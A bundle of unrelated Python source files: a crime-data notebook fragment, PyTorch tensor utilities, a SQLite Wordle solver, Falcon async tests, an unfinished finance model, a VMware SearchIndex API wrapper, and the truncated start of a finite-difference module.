In[141]: np.array(c13.groupby('Primary Type')['Arrest'].count()) # In[142]: np.array(c12.groupby('Primary Type')['Arrest'].count()) # In[143]: np.array(c11.groupby('Primary Type')['Arrest'].count()) # In[144]: np.array(c10.groupby('Primary Type')['Arrest'].count()) # In[145]: np.array(c09.groupby('Primary Type')['Arrest'].count()) # In[ ]: # In[146]: c19num=c19[['Beat','District','Ward','Community Area']] sns.heatmap(c19num.corr(),annot=True) # In[147]: c18num=c18[['Beat','District','Ward','Community Area']] sns.heatmap(c18num.corr(),annot=True) # In[148]: c01num=c01[['Beat','District']] sns.heatmap(c01num.corr(),annot=True) # In[158]: c19.corr().to_csv(link+"corr.csv") # In[149]: plt.figure(figsize=(15,15)) sns.heatmap(c19.corr(),annot=True) # In[168]: c18.head() # In[155]: c19['Latitude'].iloc[0] # In[ ]: # In[ ]:
import torch import util.image_visualization __author__ = "<NAME>" __copyright__ = "Copyright 2019, <NAME>" __credits__ = ["<NAME>"] __license__ = "Apache License 2.0" class TensorUtils: @staticmethod def tensors_are_equal(tensor_one, tensor_two): # https://stackoverflow.com/questions/32996281/how-to-check-if-two-torch-tensors-or-matrices-are-equal # https://discuss.pytorch.org/t/tensor-math-logical-operations-any-and-all-functions/6624 return torch.eq(tensor_one, tensor_two).all() # Debugging method that checks that two lists of (3-dimensional) # tensors are equal, visualizing the first pair of tensors it # encounters that is not equal, if there is one @staticmethod def tensors_lists_are_equal(tensor_list_one, tensor_list_two): if len(tensor_list_one) != len(tensor_list_two): return False index = 0 for tensor_one, tensor_two in zip(tensor_list_one, tensor_list_two): if not TensorUtils.tensors_are_equal(tensor_one, tensor_two): print("tensor_lists_are_equal --- \n" "tensor_list_one[" + str(index) + "]: \n" + str(tensor_one) + "\n" + "and " + "tensor_list_two[" + str(index) + "]" + str(tensor_two) + " are not equal.") print("showing tensor one:") element_without_channel_dimension = tensor_one.squeeze(0) util.image_visualization.imshow_tensor_2d(element_without_channel_dimension) print("showing tensor two:") element_without_channel_dimension = tensor_two.squeeze(0) util.image_visualization.imshow_tensor_2d(element_without_channel_dimension) return False index += 1 return True @staticmethod # Debugging method that finds equal slices in a 4-dimensional tensor over the batch dimension # and visualizes them def find_equal_slices_over_batch_dimension(tensor): number_or_slices = tensor.size(0) for slice_one_index in range(0, number_or_slices): tensor_slice_one = tensor[slice_one_index, :, :, :] for slice_two_index in range(slice_one_index + 1, number_or_slices): tensor_slice_two = tensor[slice_two_index, :, :, :] tensors_are_equal = TensorUtils.tensors_are_equal(tensor_slice_one, tensor_slice_two) if tensors_are_equal: print("find_equal_slices_over_batch_dimension --- \n" "tensor[" + str(slice_one_index) + ",:,:,:]: \n" + str(tensor_slice_one) + "\n" + "and " + "tensor[" + str(slice_two_index) + "]" + str(tensor_slice_two) + " are equal.") print("showing tensor slice one:") element_without_channel_dimension = tensor_slice_one.squeeze(0) util.image_visualization.imshow_tensor_2d(element_without_channel_dimension) print("showing tensor slice two:") element_without_channel_dimension = tensor_slice_two.squeeze(0) util.image_visualization.imshow_tensor_2d(element_without_channel_dimension) @staticmethod def number_of_zeros(tensor): mask = tensor.eq(0) zero_elements = torch.masked_select(tensor, mask).view(-1) number_of_zeros = zero_elements.size(0) return number_of_zeros @staticmethod def number_of_non_zeros(tensor): mask = tensor.eq(0) zero_elements = torch.masked_select(tensor, mask).view(-1) number_of_zeros = zero_elements.size(0) number_of_elements = tensor.view(-1).size(0) return number_of_elements - number_of_zeros @staticmethod def number_of_ones(tensor): mask = tensor.eq(1) one_elements = torch.masked_select(tensor, mask).view(-1) number_of_ones = one_elements.size(0) return number_of_ones @staticmethod def number_of_non_ones(tensor): mask = tensor.eq(1) one_elements = torch.masked_select(tensor, mask).view(-1) number_of_elements = tensor.view(-1).size(0) number_of_ones = one_elements.size(0) return number_of_elements - number_of_ones @staticmethod def sum_list_of_tensors(list_of_tensors): result = list_of_tensors[0] for index in range(1, len(list_of_tensors)): # if TensorUtils.tensors_are_equal(result, list_of_tensors[index]): # print("WARNING - sum_list_of_tensors - tensors are equal") # else: # print("INFO - sum_list_of_tensors - tensors are not equal") # print("result before addition: " + str(result)) # print("to add: list_of_tensors[" + str(index) + "]:" + str(list_of_tensors[index])) result += list_of_tensors[index] # print("result after addition: " + str(result)) return result """ Applies a binary mask to a tensor. The dimensions of the mask must match the last dimensions of the tensor """ @staticmethod def apply_binary_mask(tensor, mask): return tensor * mask @staticmethod def print_max(tensor, variable_name): print("max element in " + variable_name + " :" + str(torch.max(tensor))) @staticmethod def number_of_dimensions(tensor): return len(tensor.size()) @staticmethod def chunk_list_of_tensors_along_dimension(list_of_tensors: list, number_of_chunks: int, dim: int,): result_lists = list([]) for i in range(0, number_of_chunks): result_lists.append(list([])) for tensor in list_of_tensors: chunk_tensors = torch.chunk(tensor, number_of_chunks, dim) for i in range(0, len(chunk_tensors)): result_lists[i].append(chunk_tensors[i]) return result_lists """ Given a list of tensor lists, all of equal length, this method computes the element-wise summation of tensors with the same index in the inner lists """ @staticmethod def sum_lists_of_tensor_lists_element_wise(list_of_tensor_lists: list): result = list([]) for element_index in range(0, len(list_of_tensor_lists[0])): # Alternative implementation using torch.sum(torch.stack) # (Turns out to be not really faster) # summation_elements = list([]) # for list_index in range(0, len(list_of_tensor_lists)): # summation_elements.append(list_of_tensor_lists[list_index][element_index]) # # https://discuss.pytorch.org/t/how-to-turn-a-list-of-tensor-to-tensor/8868/5 # # First stack the summation elements along new dimension 0, then sum them # # along that dimension # activations_summed = torch.sum(torch.stack(summation_elements, 0), 0) # Current implementation activations_summed = list_of_tensor_lists[0][element_index] for list_index in range(1, len(list_of_tensor_lists)): activations_summed += list_of_tensor_lists[list_index][element_index] result.append(activations_summed) return result # Return a copy of a list of tensors with every element in pinned memory # The idea is that this may help when the list of tensors needs to be moved # to GPU, to speed up the data transfer @staticmethod def get_pinned_memory_copy_of_list(list_of_tensor_lists: list): result = list([]) for tensor in list_of_tensor_lists: # See: https://pytorch.org/docs/master/notes/cuda.html result.append(tensor.pin_memory()) return result def test_number_of_non_zeros(): tensor = torch.zeros(3, 3) print("tensor: " + str(tensor)) print("number of non-zeros: " + str(TensorUtils.number_of_non_zeros(tensor))) def main(): test_number_of_non_zeros() if __name__ == "__main__": main()
<reponame>kota7/wordleai-sql<gh_stars>0 # -*- coding: utf-8 -*- """ SQLite backend. Tables are named by the following convention: {vocabname}_words : contains all words {vocabname}_judges : contains judge results for all word pairs """ import os import sys import sqlite3 import math import random from contextlib import contextmanager from logging import getLogger logger = getLogger(__name__) from .utils import all_wordle_judges, _timereport, _dedup, WordEvaluation, wordle_judge, encode_judgement, _read_vocabfile from .base import WordleAI def _setup(dbfile: str, vocabname: str, words: list or dict, use_cpp: bool=True, recompile: bool=False, compiler: str=None): assert len(words) == len(set(words)), "input_words must be unique" wordlens = set(len(w) for w in words) assert len(wordlens) == 1, "word length must be equal, but '{}'".format(wordlens) with sqlite3.connect(dbfile) as conn: c = conn.cursor() c.execute("PRAGMA journal_mode=OFF") # disable rollback to save time c.execute('DROP TABLE IF EXISTS "{name}_words"'.format(name=vocabname)) c.execute('CREATE TABLE "{name}_words" (word TEXT PRIMARY KEY, weight FLOAT)'.format(name=vocabname)) if isinstance(words, dict): params = words.items() elif isinstance(words, list): params = [(w, 1) for w in words] else: raise TypeError("Unsupported type of `words`, '{}'".format(type(words))) c.executemany('INSERT INTO "{name}_words" VALUES (?,?)'.format(name=vocabname), params) c.execute('CREATE INDEX "{name}_words_idx" ON "{name}_words" (word)'.format(name=vocabname)) with _timereport("Precomputing wordle judges"): c.execute('DROP TABLE IF EXISTS "{name}_judges"'.format(name=vocabname)) c.execute('CREATE TABLE "{name}_judges" (input_word TEXT, answer_word TEXT, judge INT)'.format(name=vocabname)) params = all_wordle_judges(words, use_cpp=use_cpp, recompile=recompile, compiler=compiler) c.executemany('INSERT INTO "{name}_judges" VALUES (?,?,?)'.format(name=vocabname), params) with _timereport("Creating indices"): c.execute('CREATE INDEX "{name}_judge_idx" ON "{name}_judges" (input_word, judge)'.format(name=vocabname)) c.execute('CREATE INDEX "{name}_judge_idx2" ON "{name}_judges" (answer_word)'.format(name=vocabname)) conn.commit() # def _ensure_word_weight_column(dbfile: str, vocabname: str): # """If weight column is missing in the words table, add it with a constant 1""" # with sqlite3.connect(dbfile) as conn: # c = conn.cursor() # # check the existing column # c.execute('SELECT * FROM "{name}_words" LIMIT 1'.format(name=vocabname)) # exist = any(col[0].lower() == "weight" for col in c.description) # if not exist: # c.execute('ALTER TABLE "{name}_words" ADD weight FLOAT'.format(name=vocabname)) # logger.info('Added column `"%s_words".weight`', vocabname) # c.execute('UPDATE "{name}_words_approx" SET weight = 1.0'.format(name=vocabname)) # logger.info('Filled `"%s_words_approx".weight` with ones', vocabname) # conn.commit() def _evaluate(dbfile: str, vocabname: str, top_k: int=20, criterion: str="mean_entropy", candidates: list=None)-> list: with sqlite3.connect(dbfile) as conn: conn.create_function("log2", 1, math.log2) c = conn.cursor() # find the number of all words and compare with the number of candidates # if they are the same, then we do not need to filter answer_word c.execute('SELECT count(*) FROM "{name}_words"'.format(name=vocabname)) n_words = c.fetchone()[0] if candidates is None or len(candidates) >= n_words: # all words are in the candidates params = None answer_filter = "" else: candidate_set = set(candidates) params = tuple(candidate_set) answer_filter = "WHERE answer_word IN (%s)" % ",".join("?" * len(params)) q = """ with tmp AS ( SELECT input_word, judge, count(*) AS n, log2(count(*)) AS entropy FROM "{name}_judges" {answerfilter} GROUP BY input_word, judge ) SELECT input_word, max(n) AS max_n, 1.0 * sum(n*n) / sum(n) AS mean_n, sum(n*entropy) / sum(n) AS mean_entropy FROM tmp GROUP BY input_word """.format(answerfilter=answer_filter, name=vocabname) #print(q) if params is None: c.execute(q) else: c.execute(q, params) candidate_set = None if candidates is None else set(candidates) out = [row + (1 if candidate_set is None else int(row[0] in candidate_set),) for row in c] out = [WordEvaluation(*row) for row in out] out.sort(key=lambda row: (getattr(row, criterion), -row.is_candidate)) return out[:top_k] def _vocabnames(dbfile: str)-> list: with sqlite3.connect(dbfile) as conn: c = conn.cursor() c.execute("SELECT name FROM sqlite_master") tables = [row[0] for row in c] t1 = [t[:-6] for t in tables if t.endswith("_words")] t2 = [t[:-7] for t in tables if t.endswith("_judges")] out = list(set(t1) & set(t2)) # we need both _words and _judges tables return out def _words(dbfile: str, vocabname: str)-> list: with sqlite3.connect(dbfile) as conn: c = conn.cursor() c.execute('SELECT * FROM "{name}_words"'.format(name=vocabname)) words = [row[0] for row in c] return words def _choose_word_with_weight(dbfile: str, vocabname: str)-> str: with sqlite3.connect(dbfile) as conn: sqlite3.enable_callback_tracebacks(True) conn.create_function("log", 1, math.log) c = conn.cursor() # The query below uses the fact that # Prob{ u_i^(1/w_i) > u_j^(1/w_j) } = w_i / (w_i + w_j), # where u_i, u_j ~ uniform(0, 1). # # References: # https://utopia.duth.gr/~pefraimi/research/data/2007EncOfAlg.pdf # https://stackoverflow.com/questions/1398113/how-to-select-one-row-randomly-taking-into-account-a-weight # # On SQLite, random() generate an integer from [-9223372036854775808, +9223372036854775808] # Remove sign and take mod n to make them roughly uniform on [0, n-1] # Then plus 0.5 to avoid zero, i.e. uniform on [0.5, ..., n-0.5] # Dividing by n, uniform on [0.5/n, ... 1-0.5/n] # With n large enough, the retult is roughly uniform on (0, 1) q = """ SELECT word, -log((abs(random()) % 1000000 + 0.5) / 1000000.0) / weight AS priority FROM "{name}_words" WHERE weight > 0 ORDER BY priority LIMIT 1 """.format(name=vocabname) c.execute(q) ans = c.fetchall() return ans[0][0] def _weight_defined(dbfile: str, vocabname: str)-> bool: with sqlite3.connect(dbfile) as conn: c = conn.cursor() # check the existing column c.execute('SELECT * FROM "{name}_words" LIMIT 1'.format(name=vocabname)) for col in c.description: if col[0].lower() == "weight": return True return False class WordleAISQLite(WordleAI): """ Wordle AI with SQLite backend Vocab information is stored in {vocabname}_words and {vocabname}_judges Args: vocabname (str): Name of vocaburary words (str or list or dict): If str, the path to a vocabulary file If list, the list of words If dict, mapping from word to the weight Can be omitted if the vocabname is already in the database and resetup=False dbfile (str): SQLite database file If not supplied, use environment variable `WORDLEAISQL_DBFILE` if exists, otherwise './wordleai.db' in the current directory is used decision_metric (str): The criteria to pick a word Either 'max_n', 'mean_n', of 'mean_entropy' candidate_weight (float): The weight added to the answer candidate word when picking a word strength (float): AI strength in [0, 10] use_cpp (bool): Use C++ code to precompute wodle judgements when available cpp_recompile (bool): Compile the C++ code again if the source code has no change cpp_compiler (str): Command name of the C++ compiler. If None, 'g++' and 'clang++' are searched resetup (bool): Setup again if the vocabname already exists """ def __init__(self, vocabname: str, words: str or list or dict=None, dbfile: str=None, decision_metric: str="mean_entropy", candidate_weight: float=0.3, strength: float=6, use_cpp: bool=True, cpp_recompile: bool=False, cpp_compiler: str=None, resetup: bool=False, **kwargs): if dbfile is None: dbfile = os.environ.get("WORDLEAISQL_DBFILE") if dbfile is None: dbfile = "./wordleai.db" os.makedirs(os.path.dirname(os.path.abspath(dbfile)), exist_ok=True) self.dbfile = dbfile logger.info("SQLite database: '%s'", self.dbfile) self.vocabname = vocabname self.decision_metric = decision_metric self.candidate_weight = candidate_weight self.strength = min(max(strength, 0), 10) # clip to [0, 10] # strength is linearly converted to the power of noise: 0 -> +5, 10 -> -5 # larger noise, close to random decision self.decision_noise = math.pow(10, 5-self.strength) if resetup or (vocabname not in self.vocabnames): assert words is not None, "`words` must be supplied to setup the vocab '{}'".format(vocabname) _words = ( words if isinstance(words, dict) else {w:1.0 for w in words} if isinstance(words, list) else _read_vocabfile(words) if isinstance(words, str) else None ) if _words is None: raise TypeError("Unsupported type 'words': '{}'".format(type(words))) with _timereport("Setup tables for vocabname '%s'" % vocabname): _setup(dbfile=dbfile, vocabname=vocabname, words=_words, use_cpp=use_cpp, recompile=cpp_recompile, compiler=cpp_compiler) # else: # _ensure_word_weight_column(dbfile, vocabname) # make sure previously created words table has the weight column self._info = [] # infomation of the judge results self._nonanswer_words = set([]) # words that cannot become an answer #self.set_candidates() @property def name(self)-> str: return "Wordle AI (SQLite backend)" @property def vocabnames(self)-> list: """Available vocab names""" return _vocabnames(self.dbfile) @property def words(self)-> list: """All words that can be inputted""" return _words(self.dbfile, self.vocabname) def evaluate(self, top_k: int=20, criterion: str="mean_entropy")-> list: """ Evaluate input words and return the top ones in accordance with the given criterion """ return _evaluate(self.dbfile, self.vocabname, top_k=top_k, criterion=criterion, candidates=self.candidates) def pick_word(self): num_remain = len(self.candidates) #print(count, candidates) if num_remain == 1: return self.candidates[0] elif num_remain == 0: print("Warning: No candidates left. This is a random choice") return random.choice(self.words) results = self.evaluate(top_k=10000, criterion=self.decision_metric) #print(results[:10], len(results)) words = [row.input_word for row in results] scores = [getattr(row, self.decision_metric) for row in results] # score of eadch word, the smaller the better if self.decision_metric in ("mean_n", "max_n"): # we take log of the score to adjust for the scale # add 1p just in case to avoid the zero error scores = [math.log1p(s) for s in scores] # Flip the sign and adjust for the candidates for i, row in enumerate(results): scores[i] = row.is_candidate * self.candidate_weight - scores[i] # Subtract the maximum to avoid overflow maxscore = max(scores) scores = [s - maxscore for s in scores] # Add randomness weights = [math.exp(s / self.decision_noise) for s in scores] out = random.choices(words, weights=weights, k=1) return out[0] def choose_answer_word(self, weighted: bool=True)-> str: """Randomly choose an answer word in accordance with the given weight""" if not weighted: return random.choice(self.words) if not _weight_defined(self.dbfile, self.vocabname): print("Word weight is not defined. Please call `WordleAISQLite` with `resetup=True` next time", file=sys.stderr) return random.choice(self.words) return _choose_word_with_weight(self.dbfile, self.vocabname)
import asyncio from collections import Counter import time import pytest from falcon import runs_sync from falcon import testing from falcon.asgi import App def test_multiple(): class SomeResource: def __init__(self): self.counter = Counter() async def on_get(self, req, resp): async def background_job_async(): self.counter['backround:on_get:async'] += 1 def background_job_sync(): self.counter['backround:on_get:sync'] += 20 with pytest.raises(TypeError): resp.schedule(background_job_sync) resp.schedule_sync(background_job_sync) resp.schedule(background_job_async) resp.schedule_sync(background_job_sync) resp.schedule(background_job_async) async def on_post(self, req, resp): async def background_job_async(): self.counter['backround:on_get:async'] += 1000 def background_job_sync(): self.counter['backround:on_get:sync'] += 2000 resp.schedule(background_job_async) resp.schedule(background_job_async) resp.schedule_sync(background_job_sync) resp.schedule_sync(background_job_sync) async def on_put(self, req, resp): async def background_job_async(): self.counter['backround:on_get:async'] += 1000 c = background_job_async() try: resp.schedule(c) finally: await c resource = SomeResource() app = App() app.add_route('/', resource) client = testing.TestClient(app) client.simulate_get() client.simulate_post() time.sleep(0.5) assert resource.counter['backround:on_get:async'] == 2002 assert resource.counter['backround:on_get:sync'] == 4040 result = client.simulate_put() assert result.status_code == 500 # NOTE(kgriffs): Remove default handlers so that we can check the raised # exception is what we expecte. app._error_handlers.clear() with pytest.raises(TypeError) as exinfo: client.simulate_put() assert 'coroutine' in str(exinfo.value) class SimpleCallback: def __init__(self): self.called = 0 self.event = asyncio.Event() async def _call_me(self): self.called += 1 self.event.set() async def on_get(self, req, resp): resp.content_type = 'text/plain' resp.data = b'Hello, World!\n' resp.schedule(self._call_me) on_head = on_get async def on_get_sse(self, req, resp): async def nop_emitter(): yield None resp.sse = nop_emitter() resp.schedule(self._call_me) async def on_get_stream(self, req, resp): async def stream(): yield b'One\n' yield b'Two\n' yield b'Three\n' resp.content_type = 'text/plain' resp.stream = stream() resp.schedule(self._call_me) @pytest.fixture() def simple_resource(): return SimpleCallback() @pytest.fixture() def callback_app(simple_resource): app = App() app.add_route('/', simple_resource) app.add_route('/sse', simple_resource, suffix='sse') app.add_route('/stream', simple_resource, suffix='stream') return app @pytest.mark.parametrize('method,uri,expected', [ ('GET', '/', 'Hello, World!\n'), ('HEAD', '/', ''), ('GET', '/sse', ': ping\n\n'), ('GET', '/stream', 'One\nTwo\nThree\n'), ]) @runs_sync async def test_callback(callback_app, simple_resource, method, uri, expected): async with testing.ASGIConductor(callback_app) as conductor: resp = await conductor.simulate_request(method, uri) assert resp.status_code == 200 assert resp.text == expected await asyncio.wait_for(simple_resource.event.wait(), 3.0) assert simple_resource.called == 1
<filename>entities.py import numpy as np import finmath_calculations # MATHEMATICAL FUNCTIONS ############################################################################################### class coef_function1d(object): ''' 1-dimensional coeffitient function. It depends on only 1 argument. Contains its value, first and second derivatives in point x. ''' def __init__(self, value, FirstDerivative, SecondDerivative): self.value = value self.dx = FirstDerivative self.dxdx = SecondDerivative def ReturnValue(self, x): return self.value(x) def dx(self, x): return self.FirstDerivative(x) def dxdx(self, x): return self.SecondDerivative(x) class coef_function2d(object): ''' 2-dimensional coefficient function. Usually takes time-moment and process value as arguments. Both are real numbers. ''' def __init__(self, value, Dt, Dx, DxDx): self.value = value self.Dt = Dt self.Dx = Dx self.DxDx = Dxdx def value(self, t, x): return value(t, x) def dt(self, t, x): return self.Dt(t, x) def dx(self, t, x): return self.Dx(t, x) def dxdx(self, t, x): return self.DxDx(t, x) class coef_function3d(object): ''' 3-dimensional coefficient function. Logic remains the same. ''' def __init__(self, value, Dt, Dx, Dy, DxDy, DxDx, DyDy): self.value = value self.Dt = Dt self.Dx = Dx self.Dy = Dy self.DxDy = Dxdy self.DxDx = Dxdx self.DyDy = Dydy def value(self, t, x, y): return self.value(t, x, y) def dt(self, t, x, y): return self.Dt(t, x, y) def dx(self, t, x, y): return self.Dx(t, x, y) def dy(self, t, x, y): return self.Dy(t, x, y) def dxdy(self, t, x, y): return self.DxDy(t, x, y) def dxdx(self, t, x, y): return self.DxDx(t, x, y) def dydy(self, t, x, y): return self.DyDy(t, x, y) class mean_reversion(object): ''' Class for correlation mean-reverted drift function. It depends on N+1 arguments: nu1, ... , nuN, rho. ''' def __init__(self, value, gradient, hessian): self.value = value self.gradient = gradient self.hessian = hessian def dx(self, NuVector, rho, coordinate): return self.gradient[coordinate](NuVector, rho) def dxdx(self, NuVector, rho, i, j): return self.gessian[i][j](NuVector, rho) ######################################################################################################################## # SDE PROCESSES ######################################################################################################## class ParticleProcess(object): ''' This process describes the behaviour of the asset price. The process can be described by an SDE: dS = drift_coef(t, S)dt + diffusion_coef(t, S, Nu)dWt, where Nu is the volatility process. NOT IMPLEMENTED YET PARAMS: S0: the initial value of our diffusion. A number or a vector of numbers. drift_coef: 2d function, depends on time and process value. diffusion_coef: 3d function, depends on time, process value and volatility value. ''' def __init__(self, S0, drift_coef, diffusion_coef): self.S0 = S0 self.drift_coef = drift_coef self.diffusion_coef = diffusion_coef class VolatilityProcess(object): ''' This process describes the behaviour of the asset price. The process can be described by an SDE: dNu = drift_coef(t, Nu)dt + diffusion_coef(t, Nu)dBt, where Nu is the volatility process. NOT IMPLEMENTED YET PARAMS: Nu0: the initial value of our diffusion. A number or a vector of numbers. drift_coef: 2d function, depends on time and volatility value. diffusion_coef: 2d function, depends on time, and volatility value. ''' def __init__(self, Nu0, drift_coef, diffusion_coef): self.Nu0 = Nu0 self.drift_coef = drift_coef self.diffusion_coef = diffusion_coef class CorrelationProcess(object): ''' This process describes the behaviour of the asset price. The process can be described by an SDE: dNu = drift_coef(t, Nu)dt + diffusion_coef(t, Nu)dBt, where Nu is the volatility process. NOT IMPLEMENTED YET PARAMS: rho0: the initial value of our process. A number or a vector of numbers. mean_reversion: Psy(Nu1, ... , NuN) - rho_t. diffusion_coef: 1d function, depends only on correlation value. ''' def __init__(self, rho0, alpha, mean_reversion, diffustion_coef): self.rho0 = rho0 self.alpha = alpha self.drift_coef = self.alpha * mean_reversion self.diffusion_coef = diffusion_coef ######################################################################################################################## # STOCHASTIC CORRELATION MODEL ######################################################################################### class StochasticCorrModel(object): def __init__(Particles, Vols, Corr_Process, VolCorrMatrix, ParticleVolCorrMatrix, rho_skew): ''' Attributes: Particles -- the N-dimensional vector-process that describes asset prices. Vols -- the N-dimensional vector-process that descrives volatilities. Corr_Process -- the 1-d process that describes the correlation between brownian motions. GeneralCorrMatrix -- matrix of size 2N+1 x 2N+1 that contains all the correlations. ''' self.particles = Particles self.vols = vols self.corr_process = Corr_Process self.N = len(Particles) self.VolCorrMatrix = VolCorrMatrix self.ParticleVolCorrMatrix = ParticleVolCorrMatrix def GeneralCorrMatrix(self, cur_rho): ''' This method returns the current value of the General stochastic correlation matrix. RETURNS: np.array of size 2N+1x2N+1. ''' return CalculateGeneralCorrMatrix(cur_rho, self.rho_skew, self.ParticleVolCorrMatrix, self.VolCorrMatrix, self.N) ########################################################################################################################
from pyvisdk.base.managed_object_types import ManagedObjectTypes from pyvisdk.base.base_entity import BaseEntity import logging ######################################## # Automatically generated, do not edit. ######################################## log = logging.getLogger(__name__) class SearchIndex(BaseEntity): '''The SearchIndex service allows a client to efficiently query the inventory for a specific managed entity by attributes such as UUID, IP address, DNS name, or datastore path. Such searches typically return a VirtualMachine or a HostSystem. While searching, only objects for which the user has sufficient privileges are considered. The findByInventoryPath and findChild operations only search on entities for which the user has view privileges; all other SearchIndex find operations only search virtual machines and hosts for which the user has read privileges. If the user does not have sufficient privileges for an object that matches the search criteria, that object is not returned.''' def __init__(self, core, name=None, ref=None, type=ManagedObjectTypes.SearchIndex): super(SearchIndex, self).__init__(core, name=name, ref=ref, type=type) def FindAllByDnsName(self, dnsName, vmSearch, datacenter=None): '''Finds all virtual machines or hosts by DNS name. The DNS name for a virtual machine is the one returned from VMware tools, hostName. :param datacenter: If specified, restricts the query to entities in a particular datacenter. If not specified, the entire inventory is searched. :param dnsName: The fully qualified domain name to find. :param vmSearch: If true, search for virtual machines, otherwise search for hosts. ''' return self.delegate("FindAllByDnsName")(datacenter, dnsName, vmSearch) def FindAllByIp(self, ip, vmSearch, datacenter=None): '''Finds all virtual machines or hosts by IP address, where the IP address is in dot-decimal notation. For example, 10.17.12.12. The IP address for a virtual machine is the one returned from VMware tools, ipAddress. :param datacenter: If specified, restricts the query to entities in a particular datacenter. If not specified, the entire inventory is searched. :param ip: The dot-decimal notation formatted IP address to find. :param vmSearch: If true, search for virtual machines, otherwise search for hosts. ''' return self.delegate("FindAllByIp")(datacenter, ip, vmSearch) def FindAllByUuid(self, uuid, vmSearch, datacenter=None, instanceUuid=None): '''Finds all virtual machines or hosts by UUID. :param datacenter: If specified, restricts the query to entities in a particular datacenter. If not specified, the entire inventory is searched. :param uuid: The UUID to find. If vmSearch is true, the UUID can be either BIOS or instance UUID. :param vmSearch: If true, search for virtual machines, otherwise search for hosts. :param instanceUuid: Should only be set when vmSearch is true. If specified, search for virtual machines whose instance UUID matches the given uuid. Otherwise, search for virtual machines whose BIOS UUID matches the given uuid. ''' return self.delegate("FindAllByUuid")(datacenter, uuid, vmSearch, instanceUuid) def FindByDatastorePath(self, datacenter, path): '''Finds a virtual machine by its location on a datastore. :param datacenter: Specifies the datacenter to which the datastore path belongs. :param path: A datastore path to the .vmx file for the virtual machine. ''' return self.delegate("FindByDatastorePath")(datacenter, path) def FindByDnsName(self, dnsName, vmSearch, datacenter=None): '''Finds a virtual machine or host by DNS name. The DNS name for a virtual machine is the one returned from VMware tools, hostName. :param datacenter: If specified, restricts the query to entities in a particular datacenter. If not specified, the entire inventory is searched. :param dnsName: The fully qualified domain name to find. :param vmSearch: if true, search for virtual machines, otherwise search for hosts. ''' return self.delegate("FindByDnsName")(datacenter, dnsName, vmSearch) def FindByInventoryPath(self, inventoryPath): '''Finds a managed entity based on its location in the inventory. The path is separated by slashes ('/'). For example, a path should be of the form "My Folder/My Datacenter/vm/Discovered VM/VM1". A leading slash or trailing slash is ignored. Thus, the following paths all represents the same object: "a/b", "/a/b", "a/b/", and '/a/b/'. Slashes in names must be represented using %2f, following the standard URL syntax. Any object in the inventory can be retrieved using this method, including resource pools and hosts. :param inventoryPath: The path to the entity. ''' return self.delegate("FindByInventoryPath")(inventoryPath) def FindByIp(self, ip, vmSearch, datacenter=None): '''Finds a virtual machine or host by IP address, where the IP address is in dot- decimal notation. For example, 10.17.12.12. The IP address for a virtual machine is the one returned from VMware tools, ipAddress. :param datacenter: If specified, restricts the query to entities in a particular datacenter. If not specified, the entire inventory is searched. :param ip: The dot-decimal notation formatted IP address to find. :param vmSearch: if true, search for virtual machines, otherwise search for hosts. ''' return self.delegate("FindByIp")(datacenter, ip, vmSearch) def FindByUuid(self, uuid, vmSearch, datacenter=None, instanceUuid=None): '''Finds a virtual machine or host by BIOS or instance UUID. :param datacenter: If specified, restricts the query to entities in a particular datacenter. If not specified, the entire inventory is searched. :param uuid: The UUID to find. If vmSearch is true, the uuid can be either BIOS or instance UUID. :param vmSearch: If true, search for virtual machines, otherwise search for hosts. :param instanceUuid: Should only be set when vmSearch is true. If specified, search for virtual machines whose instance UUID matches the given uuid. Otherwise, search for virtual machines whose BIOS UUID matches the given uuid.vSphere API 4.0 ''' return self.delegate("FindByUuid")(datacenter, uuid, vmSearch, instanceUuid) def FindChild(self, entity, name): '''Finds a particular child based on a managed entity name. This only searches the immediate children of a managed entity. For a Datacenter, the host and vm folders are considered children. For a ComputeResource, the hosts and root ResourcePool are considered children. :param entity: A reference to a managed entity. :param name: The name of the child object. ''' return self.delegate("FindChild")(entity, name)
<gh_stars>1-10 r"""@package motsfinder.metric.discrete.numerical Numerical low-level computations and helpers. These are used by e.g. the .patch.DataPatch classes to perform their interpolation and differentiation on grids of data. """ import itertools from operator import add import numpy as np from scipy.interpolate import lagrange from ...numutils import NumericalError, nan_mat __all__ = [ "fd_xz_derivatives", ] # 1-D finite difference coefficients for first derivatives COEFFS_1ST = [ np.array([ -1., 0., 1. ]) / 2., # order=2 np.array([ 1., -8., 0., 8., -1. ]) / 12., # order=4 np.array([ -1., 9., -45., 0., 45., -9., 1. ]) / 60., # order=6 np.array([3., -32., 168., -672., 0., 672., -168., 32., -3.]) / 840., # order=8 ] # 1-D finite difference coefficients for second derivatives COEFFS_2ND = [ np.array([ 1., -2., 1. ]), # order=2 np.array([ -1., 16., -30., 16., -1. ]) / 12., # order=4 np.array([ 2., -27., 270., -490., 270., -27., 2. ]) / 180., # order=6 np.array([-9., 128., -1008., 8064., -14350., 8064., -1008., 128., -9.]) / 5040., # order=8 ] class GridDataError(Exception): r"""Raised if discrete data is not compatible with this module.""" pass def interpolate(mat, coords, linear=False, cache=None, base_idx=None): r"""Given a (small) matrix patch, interpolate a value between grid points. This takes the whole matrix patch supplied, i.e. the order of the interpolating polynomial is determined by the size of the patch. For example, if `mat` is a 5x5x5 matrix, 5 point Lagrange interpolation is performed. @param mat Patch to interpolate within. The size of the patch determines the order of the interpolating polynomials. @param coords Coordinates in relative index space at which to interpolate. Should be closest to the center grid point for best results. For example, if `mat` is a 5x5 matrix with indices ``mat[i,j], i=0,...,4, j=0,...,4``, then possible `coords` are ``coords = (1.8, 2.2)``. If the grid points correspond to physical coordinates, they should be translated into relative index space for this function. @param linear If `True`, ignore the patch size and do simple linear interpolation. Default is `False`. @param cache Optional dictionary to store and reuse interpolating Lagrange polynomials for the first axis of the matrix patch. If given, you also need to supply `base_idx`, which maps the patch back to the full matrix and allows the cache to be used for the whole data. @param base_idx Tuple of as many indices as `mat` has axes. This allows the optional cache to be applicable to the full data when supplying only small patches of it to this function. """ # "collapse" along each axis, one by one. try: for coord in coords: mat = _apply_along_first_axis(_interp1d, mat, coord, linear, cache, base_idx) cache = base_idx = None except (ValueError, IndexError) as e: raise NumericalError("%s" % e) return mat def _apply_along_first_axis(func, mat, *args, **kwargs): r"""Similar to np.apply_along_axis(), but call func with the fixed indices. In contrast to `np.apply_along_axis()`, `func` is called with the tuple `ii` of indices that are fixed in `mat` as second positional argument. This provides context for where the function is being evaluated in the matrix which may be used to implement e.g. caching mechanisms. """ shape = mat[1:] if isinstance(mat, tuple) else mat.shape[1:] out = np.zeros(shape) for ii in np.ndindex(out.shape): out[ii] = func(mat[np.index_exp[:] + ii], ii, *args, 